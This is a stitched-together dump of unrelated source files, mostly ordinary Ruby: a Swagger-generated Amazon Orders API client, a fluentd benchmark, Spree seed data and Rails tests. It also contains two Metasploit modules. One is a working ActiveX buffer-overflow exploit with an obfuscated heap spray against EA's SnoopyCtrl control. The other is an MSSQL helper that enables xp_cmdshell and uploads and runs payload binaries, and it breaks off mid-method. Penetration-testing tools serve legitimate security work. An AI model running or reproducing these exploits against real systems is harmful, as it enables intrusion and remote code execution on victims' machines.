auth_names = opts[:debug_auth_names] || []
new_options = opts.merge(
:header_params => header_params,
:query_params => query_params,
:form_params => form_params,
:body => post_body,
:auth_names => auth_names,
:return_type => return_type
)
data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options)
if @api_client.config.debugging
@api_client.config.logger.debug "API called: StoreApi#get_order_by_id\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
return data, status_code, headers
end
# Place an order for a pet
# @param order [Order] order placed for purchasing the pet
# @param [Hash] opts the optional parameters
# @return [Order]
def place_order(order, opts = {})
data, _status_code, _headers = place_order_with_http_info(order, opts)
data
end
# Place an order for a pet
# @param order [Order] order placed for purchasing the pet
# @param [Hash] opts the optional parameters
# @return [Array<(Order, Integer, Hash)>] Order data, response status code and response headers
def place_order_with_http_info(order, opts = {})
if @api_client.config.debugging
@api_client.config.logger.debug 'Calling API: StoreApi.place_order ...'
end
# verify the required parameter 'order' is set
if @api_client.config.client_side_validation && order.nil?
fail ArgumentError, "Missing the required parameter 'order' when calling StoreApi.place_order"
end
# resource path
local_var_path = '/store/order'
# query parameters
query_params = opts[:query_params] || {}
# header parameters
header_params = opts[:header_params] || {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/xml', 'application/json'])
# HTTP header 'Content-Type'
header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])
# form parameters
form_params = opts[:form_params] || {}
# http body (model)
post_body = opts[:debug_body] || @api_client.object_to_http_body(order)
# return_type
return_type = opts[:debug_return_type] || 'Order'
# auth_names
auth_names = opts[:debug_auth_names] || []
new_options = opts.merge(
:header_params => header_params,
:query_params => query_params,
:form_params => form_params,
:body => post_body,
:auth_names => auth_names,
:return_type => return_type
)
data, status_code, headers = @api_client.call_api(:POST, local_var_path, new_options)
if @api_client.config.debugging
@api_client.config.logger.debug "API called: StoreApi#place_order\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
return data, status_code, headers
end
end
end
| 37.557196 | 157 | 0.669876 |
38dd2474ca16a873ac97e1249a13052216f202f5 | 7,094 | =begin
#Selling Partner API for Orders
#The Selling Partner API for Orders helps you programmatically retrieve order information. These APIs let you develop fast, flexible, custom applications in areas like order synchronization, order research, and demand-based decision support tools.
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.24
=end
require 'date'
module AmzSpApi::OrdersApiModel
# The shipping address for the order.
class OrderAddress
# An Amazon-defined order identifier, in 3-7-7 format.
attr_accessor :amazon_order_id
attr_accessor :shipping_address
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'amazon_order_id' => :'AmazonOrderId',
:'shipping_address' => :'ShippingAddress'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'amazon_order_id' => :'Object',
:'shipping_address' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::OrdersApiModel::OrderAddress` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::OrdersApiModel::OrderAddress`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'amazon_order_id')
self.amazon_order_id = attributes[:'amazon_order_id']
end
if attributes.key?(:'shipping_address')
self.shipping_address = attributes[:'shipping_address']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @amazon_order_id.nil?
invalid_properties.push('invalid value for "amazon_order_id", amazon_order_id cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @amazon_order_id.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
amazon_order_id == o.amazon_order_id &&
shipping_address == o.shipping_address
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[amazon_order_id, shipping_address].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::OrdersApiModel.const_get(type).build_from_hash(value)
end
end
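    # Illustrative examples (not part of the generated client) of how the
    # deserializer above maps raw values, assuming the documented types:
    #   _deserialize(:Integer, '42')            #=> 42
    #   _deserialize('Array<Integer>', %w[1 2]) #=> [1, 2]
    #   _deserialize(:Date, '2021-01-31')       #=> Date.parse('2021-01-31')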
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
    end
  end
end
| 31.811659 | 247 | 0.639132 |
d587b59c651614f19ef5febd1c85606455633138 | 38 | module Rolify
VERSION = "3.4.0"
end
| 9.5 | 19 | 0.657895 |
084d70fc2043f3423a6acc4b29123fb28a71301e | 448 | Pod::Spec.new do |s|
s.name = 'Colours'
s.version = '0.0.1'
s.summary = '100s of beautiful, predefined UIColors and UIColor methods.'
s.author = {
'Ben Gordon' => 'brgordon@ua.edu'
}
s.source = {
:git => 'https://github.com/bennyguitar/Colours-for-iOS.git',
:commit => '916c095'
}
s.homepage = 'http://subvertapps.com'
s.license = 'LICENSE'
s.source_files = '*.{h,m}'
s.platform = :ios
end | 28 | 80 | 0.578125 |
bb8a91bfa8fc5a6544f34e4d6e60a55a69cef6ce | 2,817 | #
# Copyright 2014-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
require_relative '../test/helper'
require 'fluent/plugin/out_kinesis_streams'
require 'fluent/plugin/out_kinesis_streams_aggregated'
require 'fluent/plugin/out_kinesis_firehose'
require 'benchmark'
require 'net/empty_port'
namespace :benchmark do
task :local do
KinesisBenchmark.new.run
end
task :remote do
KinesisBenchmark.new(false).run
end
end
class KinesisBenchmark
def initialize(local = true)
@local = local
Fluent::Test.setup
end
def run
setup
    benchmark((ENV['SIZE'] || 100).to_i, (ENV['COUNT'] || 10000).to_i)
teardown
end
def setup
return if not @local
@port = Net::EmptyPort.empty_port
@server_pid = fork do
Process.setsid
server = DummyServer.start(port: @port)
Signal.trap("TERM") do
server.shutdown
end
server.thread.join
end
Net::EmptyPort.wait(@port, 3)
end
def teardown
return if not @local
Process.kill "TERM", @server_pid
Process.waitpid @server_pid
end
def default_config
conf = %[
log_level error
region ap-northeast-1
data_key a
]
if @local
conf += %[
endpoint https://localhost:#{@port}
ssl_verify_peer false
]
end
conf
end
def create_driver(type, conf = default_config)
klass = case type
when :streams
Fluent::KinesisStreamsOutput
when :streams_aggregated
Fluent::KinesisStreamsAggregatedOutput
when :firehose
Fluent::KinesisFirehoseOutput
end
conf += case type
when :streams, :streams_aggregated
"stream_name fluent-plugin-test"
when :firehose
"delivery_stream_name fluent-plugin-test"
end
if fluentd_v0_12?
Fluent::Test::BufferedOutputTestDriver.new(klass) do
end.configure(conf)
else
Fluent::Test::Driver::Output.new(klass) do
end.configure(conf)
end
end
def benchmark(size, count)
record = {"a"=>"a"*size}
Benchmark.bmbm(20) do |x|
[:streams_aggregated, :streams, :firehose].each do |type|
x.report(type) { driver_run(create_driver(type), count.times.map{|i|record}) }
end
end
end
end
| 25.378378 | 88 | 0.656372 |
39fe9968776a9e148bbdb9a0c020c120a4589ccb | 163 | class LessonWordSynonym < ActiveRecord::Base
belongs_to :lesson_word
belongs_to :synonym
validates_uniqueness_of :lesson_word_id, :scope => :synonym_id
end
| 23.285714 | 64 | 0.803681 |
1ca7185045053d30d164cf68661b04f00dd03d74 | 338 | class AddExifTagToCaptureDeviceMakerAndModel < ActiveRecord::Migration
def self.up
add_column :capture_device_makers, :exif_tag, :string
add_column :capture_device_models, :exif_tag, :string
end
def self.down
remove_column :capture_device_makers, :exif_tag
remove_column :capture_device_models, :exif_tag
end
end
| 28.166667 | 70 | 0.789941 |
870016258ffbb7257fca052a8353048098d2a5f0 | 580 | # frozen_string_literal: true
module RuboCop
module Cop
module SketchupDeprecations
# Method is deprecated. Use `SKETCHUP_CONSOLE.show` instead.
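      #
      # @example Illustrative only (the matcher below flags bare calls)
      #   # bad
      #   show_ruby_panel
      #
      #   # good
      #   SKETCHUP_CONSOLE.show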
class ShowRubyPanel < SketchUp::Cop
MSG = 'Method is deprecated. Use `SKETCHUP_CONSOLE.show` '\
'instead.'.freeze
def_node_matcher :show_ruby_panel?, <<-PATTERN
(send nil? :show_ruby_panel)
PATTERN
def on_send(node)
return unless show_ruby_panel?(node)
add_offense(node, location: :expression)
end
end
end
end
end
| 22.307692 | 67 | 0.632759 |
bb702e325e3e49ef4939c7fa5d86ea4d5ed67709 | 498 | class GravatarUrlBuilder
attr_reader :user, :size
private :user, :size
def initialize(user, size)
@user, @size = user, size
end
def url
"http://www.gravatar.com/avatar/#{gravatar_hash}?s=#{size}&d=#{default_url}"
end
private
def gravatar_hash
Digest::MD5.hexdigest(sanitised_user_email)
end
def sanitised_user_email
user.email.strip.downcase
end
def default_url
"http://www.gravatar.com/avatar/436053b3e050d4156773bc04cfb167fe?s=#{size}"
end
end
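# Minimal usage sketch (assumes a user object that responds to #email):
#   GravatarUrlBuilder.new(user, 80).url
#   #=> "http://www.gravatar.com/avatar/<md5 of downcased email>?s=80&d=..."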
| 18.444444 | 80 | 0.708835 |
4a48b7a50c6d6cf759fa21b13309f8b5ebe88b8f | 6,232 | unless ENV['SKIP_SAMPLE_IMAGES']
Spree::Sample.load_sample('products')
Spree::Sample.load_sample('variants')
products = {}
products[:ror_baseball_jersey] = Spree::Product.find_by!(name: 'Ruby on Rails Baseball Jersey')
products[:ror_tote] = Spree::Product.find_by!(name: 'Ruby on Rails Tote')
products[:ror_bag] = Spree::Product.find_by!(name: 'Ruby on Rails Bag')
products[:ror_jr_spaghetti] = Spree::Product.find_by!(name: 'Ruby on Rails Jr. Spaghetti')
products[:ror_mug] = Spree::Product.find_by!(name: 'Ruby on Rails Mug')
products[:ror_ringer] = Spree::Product.find_by!(name: 'Ruby on Rails Ringer T-Shirt')
products[:ror_stein] = Spree::Product.find_by!(name: 'Ruby on Rails Stein')
products[:spree_baseball_jersey] = Spree::Product.find_by!(name: 'Spree Baseball Jersey')
products[:spree_stein] = Spree::Product.find_by!(name: 'Spree Stein')
products[:spree_jr_spaghetti] = Spree::Product.find_by!(name: 'Spree Jr. Spaghetti')
products[:spree_mug] = Spree::Product.find_by!(name: 'Spree Mug')
products[:spree_ringer] = Spree::Product.find_by!(name: 'Spree Ringer T-Shirt')
products[:spree_tote] = Spree::Product.find_by!(name: 'Spree Tote')
products[:spree_bag] = Spree::Product.find_by!(name: 'Spree Bag')
products[:ruby_baseball_jersey] = Spree::Product.find_by!(name: 'Ruby Baseball Jersey')
products[:apache_baseball_jersey] = Spree::Product.find_by!(name: 'Apache Baseball Jersey')
def image(name, type = 'jpeg')
images_path = Pathname.new(File.dirname(__FILE__)) + 'images'
path = images_path + file_name(name, type)
return false unless File.exist?(path)
File.open(path)
end
def file_name(name, type = 'jpeg')
"#{name}.#{type}"
end
def attach_paperclip_image(variant, name, type)
if variant.images.where(attachment_file_name: file_name(name, type)).none?
image = image(name, type)
variant.images.create!(attachment: image)
end
end
def attach_active_storage_image(variant, name, type)
if variant.images.with_attached_attachment.where(active_storage_blobs: { filename: file_name(name, type) }).none?
image = image(name, type)
variant.images.create!(attachment: { io: image, filename: file_name(name, type) })
end
end
images = {
products[:ror_tote].master => [
{
name: file_name('ror_tote'),
attachment: image('ror_tote')
},
{
name: file_name('ror_tote_back'),
attachment: image('ror_tote_back')
}
],
products[:ror_bag].master => [
{
name: file_name('ror_bag'),
attachment: image('ror_bag')
}
],
products[:ror_baseball_jersey].master => [
{
name: file_name('ror_baseball'),
attachment: image('ror_baseball')
},
{
name: file_name('ror_baseball_back'),
attachment: image('ror_baseball_back')
}
],
products[:ror_jr_spaghetti].master => [
{
name: file_name('ror_jr_spaghetti'),
attachment: image('ror_jr_spaghetti')
}
],
products[:ror_mug].master => [
{
name: file_name('ror_mug'),
attachment: image('ror_mug')
},
{
name: file_name('ror_mug_back'),
attachment: image('ror_mug_back')
}
],
products[:ror_ringer].master => [
{
name: file_name('ror_ringer'),
attachment: image('ror_ringer')
},
{
name: file_name('ror_ringer_back'),
attachment: image('ror_ringer_back')
}
],
products[:ror_stein].master => [
{
name: file_name('ror_stein'),
attachment: image('ror_stein')
},
{
name: file_name('ror_stein_back'),
attachment: image('ror_stein_back')
}
],
products[:apache_baseball_jersey].master => [
{
name: file_name('apache_baseball', 'png'),
attachment: image('apache_baseball', 'png')
}
],
products[:ruby_baseball_jersey].master => [
{
name: file_name('ruby_baseball', 'png'),
attachment: image('ruby_baseball', 'png')
}
],
products[:spree_bag].master => [
{
name: file_name('spree_bag'),
attachment: image('spree_bag')
}
],
products[:spree_tote].master => [
{
name: file_name('spree_tote_front'),
attachment: image('spree_tote_front')
},
{
name: file_name('spree_tote_back'),
attachment: image('spree_tote_back')
}
],
products[:spree_ringer].master => [
{
name: file_name('spree_ringer_t'),
attachment: image('spree_ringer_t')
},
{
name: file_name('spree_ringer_t_back'),
attachment: image('spree_ringer_t_back')
}
],
products[:spree_jr_spaghetti].master => [
{
name: file_name('spree_spaghetti'),
attachment: image('spree_spaghetti')
}
],
products[:spree_baseball_jersey].master => [
{
name: file_name('spree_jersey'),
attachment: image('spree_jersey')
},
{
name: file_name('spree_jersey_back'),
attachment: image('spree_jersey_back')
}
],
products[:spree_stein].master => [
{
name: file_name('spree_stein'),
attachment: image('spree_stein')
},
{
name: file_name('spree_stein_back'),
attachment: image('spree_stein_back')
}
],
products[:spree_mug].master => [
{
name: file_name('spree_mug'),
attachment: image('spree_mug')
},
{
name: file_name('spree_mug_back'),
attachment: image('spree_mug_back')
}
]
}
products[:ror_baseball_jersey].variants.each do |variant|
color = variant.option_value('tshirt-color').downcase
attach_active_storage_image(variant, "ror_baseball_jersey_#{color}", 'png')
attach_active_storage_image(variant, "ror_baseball_jersey_back_#{color}", 'png')
end
images.each do |variant, attachments|
puts "Loading images for #{variant.product.name}"
attachments.each do |attrs|
name, type = attrs.delete(:name).split('.')
attach_active_storage_image(variant, name, type)
end
end
end
| 30.851485 | 117 | 0.618421 |
f893fba3920db8c7d308d24229e170bde20ff07a | 2,905 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl
ActiveX Control (NPSnpy.dll 1.1.0.36. When sending an overly long
string to the CheckRequirements() method, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2007-4466' ],
[ 'OSVDB', '37723'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Oct 8 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or al, 12").encode_string * 2)
js = %Q|
try {
var evil_string = "";
var index;
var vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);
for (index = 0; index < 5000; index++) {
evil_string = evil_string + my_unescape('#{ret}');
}
vulnerable.CheckRequirements(evil_string);
} catch( e ) { window.location = 'about:blank' ; }
|
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => [
'vulnerable',
'shellcode',
'my_unescape',
'index',
'evil_string',
]
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.update_opts(js_heap_spray.opts)
js.obfuscate()
content = %Q|<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
| 26.171171 | 107 | 0.554217 |
08000590e230654f81efefece65f7e5ab5cb80ca | 4,541 | require File.dirname(__FILE__) + '/../test/test_helper'
class LiveValidationTest < ActiveRecord::TestCase
def setup
Resource.class_eval do # reset live validations
@live_validations = {}
end
end
def test_live_validations_accessor
assert_kind_of(Hash, Resource.live_validations)
end
def test_without_validations
assert_equal({}, Resource.live_validations)
end
def test_without_ok_message
Resource.class_eval do
validates_presence_of :name, :message => "can't be blank"
end
assert_equal("", Resource.live_validations[:name][:presence][:validMessage])
end
def test_with_ok_message
Resource.class_eval do
validates_presence_of :name, :message => "can't be blank", :validMessage => 'thank you!'
end
assert_equal("thank you!", Resource.live_validations[:name][:presence][:validMessage])
end
def test_presence
Resource.class_eval do
validates_presence_of :name, :message => "can't be blank"
end
assert_equal("can't be blank", Resource.live_validations[:name][:presence][:failureMessage])
end
def test_presence_more_than_one_attribute
Resource.class_eval do
validates_presence_of :name, :amount, :message => "can't be blank"
end
assert_equal("can't be blank", Resource.live_validations[:name][:presence][:failureMessage])
assert_equal("can't be blank", Resource.live_validations[:amount][:presence][:failureMessage])
end
def test_numericality
Resource.class_eval do
validates_numericality_of :amount, :message => "isn't a valid number"
end
assert_equal("isn't a valid number", Resource.live_validations[:amount][:numericality][:notANumberMessage])
assert(!Resource.live_validations[:amount][:numericality][:onlyInteger])
end
def test_numericality_only_integer
Resource.class_eval do
validates_numericality_of :amount, :only_integer => true, :message => "isn't an integer number"
end
assert_equal("isn't an integer number", Resource.live_validations[:amount][:numericality][:notAnIntegerMessage])
assert(Resource.live_validations[:amount][:numericality][:onlyInteger])
end
def test_format
Resource.class_eval do
validates_format_of :name, :with => /^\w+$/, :message => "only letters are accepted"
end
assert_equal("only letters are accepted", Resource.live_validations[:name][:format][:failureMessage])
assert_equal(/^\w+$/, Resource.live_validations[:name][:format][:pattern])
end
def test_length_max
Resource.class_eval do
validates_length_of :name, :maximum => 10, :message => "must be under 10 characters long"
end
assert_equal("must be under 10 characters long", Resource.live_validations[:name][:length][:failureMessage])
assert_equal(10, Resource.live_validations[:name][:length][:maximum])
end
def test_length_min
Resource.class_eval do
validates_length_of :name, :minimum => 4, :message => "must be more than 4 characters long"
end
assert_equal("must be more than 4 characters long", Resource.live_validations[:name][:length][:failureMessage])
assert_equal(4, Resource.live_validations[:name][:length][:minimum])
end
def test_length_range
Resource.class_eval do
validates_length_of :name, :in => 4..10, :message => "must be between 4 and 10 characters long"
end
assert_equal("must be between 4 and 10 characters long", Resource.live_validations[:name][:length][:failureMessage])
assert_equal(4, Resource.live_validations[:name][:length][:minimum])
assert_equal(10, Resource.live_validations[:name][:length][:maximum])
assert_nil(Resource.live_validations[:name][:length][:in])
end
def test_length_exact
Resource.class_eval do
validates_length_of :name, :is => 5, :message => "must be 5 characters long"
end
assert_equal("must be 5 characters long", Resource.live_validations[:name][:length][:failureMessage])
assert_equal(5, Resource.live_validations[:name][:length][:is])
end
def test_acceptance
Resource.class_eval do
validates_acceptance_of :conditions, :message => "you must accept conditions"
end
assert_equal("you must accept conditions", Resource.live_validations[:conditions][:acceptance][:failureMessage])
end
def test_confirmation
Resource.class_eval do
validates_confirmation_of :name, :message => "doesn't match"
end
assert_equal("doesn't match", Resource.live_validations[:name][:confirmation][:failureMessage])
end
end
| 37.528926 | 120 | 0.723849 |
ff202a6cd79802056fbe8e120dd58a9fc7055d72 | 486 | # frozen_string_literal: true
require 'sauce_bindings'
require 'rspec'
describe 'Create Session' do
it 'starts session' do
# 1. Create Session object with the defaults
session = SauceBindings::Session.new
# 2. Start Session to get the Driver
driver = session.start
# 3. Use the driver in your tests just like normal
driver.get('https://www.saucedemo.com/')
# 4. Stop the Session with whether the test passed or failed
session.stop(true)
end
end
| 23.142857 | 64 | 0.705761 |
6a5b5d0e7ce572545fbb7e1c40d1fa7de7486a17 | 26,190 | # -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
module Msf
###
#
# This module exposes methods for querying a remote MSSQL service
#
###
module Exploit::Remote::MSSQL
include Exploit::Remote::MSSQL_COMMANDS
include Exploit::Remote::Udp
include Exploit::Remote::Tcp
include Exploit::Remote::NTLM::Client
# Encryption
ENCRYPT_OFF = 0x00 #Encryption is available but off.
ENCRYPT_ON = 0x01 #Encryption is available and on.
ENCRYPT_NOT_SUP = 0x02 #Encryption is not available.
ENCRYPT_REQ = 0x03 #Encryption is required.
# Packet Type
TYPE_SQL_BATCH = 1 # (Client) SQL command
TYPE_PRE_TDS7_LOGIN = 2 # (Client) Pre-login with version < 7 (unused)
TYPE_RPC = 3 # (Client) RPC
  TYPE_TABLE_RESPONSE               = 4  # (Server) Pre-Login Response, Login Response, Row Data, Return Status, Return Parameters,
# Request Completion, Error and Info Messages, Attention Acknowledgement
TYPE_ATTENTION_SIGNAL = 6 # (Client) Attention
TYPE_BULK_LOAD = 7 # (Client) SQL Command with binary data
  TYPE_TRANSACTION_MANAGER_REQUEST  = 14 # (Client) Transaction manager request
TYPE_TDS7_LOGIN = 16 # (Client) Login
TYPE_SSPI_MESSAGE = 17 # (Client) Login
TYPE_PRE_LOGIN_MESSAGE = 18 # (Client) pre-login with version > 7
# Status
STATUS_NORMAL = 0x00
STATUS_END_OF_MESSAGE = 0x01
STATUS_IGNORE_EVENT = 0x02
STATUS_RESETCONNECTION = 0x08 # TDS 7.1+
STATUS_RESETCONNECTIONSKIPTRAN = 0x10 # TDS 7.3+
#
# Creates an instance of a MSSQL exploit module.
#
def initialize(info = {})
super
# Register the options that all MSSQL exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(1433),
OptString.new('USERNAME', [ false, 'The username to authenticate as', 'sa']),
OptString.new('PASSWORD', [ false, 'The password for the specified username', '']),
OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),
        OptBool.new('USE_WINDOWS_AUTHENT', [ true, 'Use Windows authentication (requires DOMAIN option set)', false]),
], Msf::Exploit::Remote::MSSQL)
register_advanced_options(
[
OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
]),
OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'])
], Msf::Exploit::Remote::MSSQL)
register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
end
#
# This method sends a UDP query packet to the server and
# parses out the reply packet into a hash
#
def mssql_ping(timeout=5)
data = { }
ping_sock = Rex::Socket::Udp.create(
'PeerHost' => rhost,
'PeerPort' => 1434,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
ping_sock.put("\x02")
resp, _saddr, _sport = ping_sock.recvfrom(65535, timeout)
ping_sock.close
return data if not resp
return data if resp.length == 0
return mssql_ping_parse(resp)
end
#
# Parse a 'ping' response and format as a hash
#
def mssql_ping_parse(data)
res = []
var = nil
idx = data.index('ServerName')
return res if not idx
sdata = data[idx, (data.length - 1)]
instances = sdata.split(';;')
instances.each do |instance|
rinst = {}
instance.split(';').each do |d|
if (not var)
var = d
else
if (var.length > 0)
rinst[var] = d
var = nil
end
end
end
res << rinst
end
return res
end
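  # Illustrative only: the SQL Server Browser reply is a run of semicolon
  # separated key/value pairs per instance, so a response such as
  #   "ServerName;SQLHOST;InstanceName;MSSQLSERVER;tcp;1433;;"
  # parses into
  #   [{ "ServerName" => "SQLHOST", "InstanceName" => "MSSQLSERVER", "tcp" => "1433" }]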
#
# Execute a system command via xp_cmdshell
#
def mssql_xpcmdshell(cmd, doprint=false, opts={})
force_enable = false
begin
res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts)
if res[:errors] && !res[:errors].empty?
if res[:errors].join =~ /xp_cmdshell/
if force_enable
print_error("The xp_cmdshell procedure is not available and could not be enabled")
raise RuntimeError, "Failed to execute command"
else
print_status("The server may have xp_cmdshell disabled, trying to enable it...")
mssql_query(mssql_xpcmdshell_enable())
raise RuntimeError, "xp_cmdshell disabled"
end
end
end
mssql_print_reply(res) if doprint
return res
rescue RuntimeError => e
if e.to_s =~ /xp_cmdshell disabled/
force_enable = true
retry
end
raise e
end
end
#
# Upload and execute a Windows binary through MSSQL queries
#
def mssql_upload_exec(exe, debug=false)
hex = exe.unpack("H*")[0]
var_bypass = rand_text_alpha(8)
var_payload = rand_text_alpha(8)
print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
print_status("Writing the debug.com loader to the disk...")
h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))
h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
h2b.split(/\n/).each do |line|
mssql_xpcmdshell("#{line}", false)
end
print_status("Converting the debug script to an executable...")
mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug)
mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug)
print_status("Uploading the payload, please be patient...")
idx = 0
cnt = 500
while(idx < hex.length - 1)
mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
idx += cnt
end
print_status("Converting the encoded payload...")
mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
print_status("Executing the payload...")
mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
end
#
# Upload and execute a Windows binary through MSSQL queries and Powershell
#
def powershell_upload_exec(exe, debug=false)
# hex converter
hex = exe.unpack("H*")[0]
# create random alpha 8 character names
#var_bypass = rand_text_alpha(8)
var_payload = rand_text_alpha(8)
print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
# our payload converter, grabs a hex file and converts it to binary for us through powershell
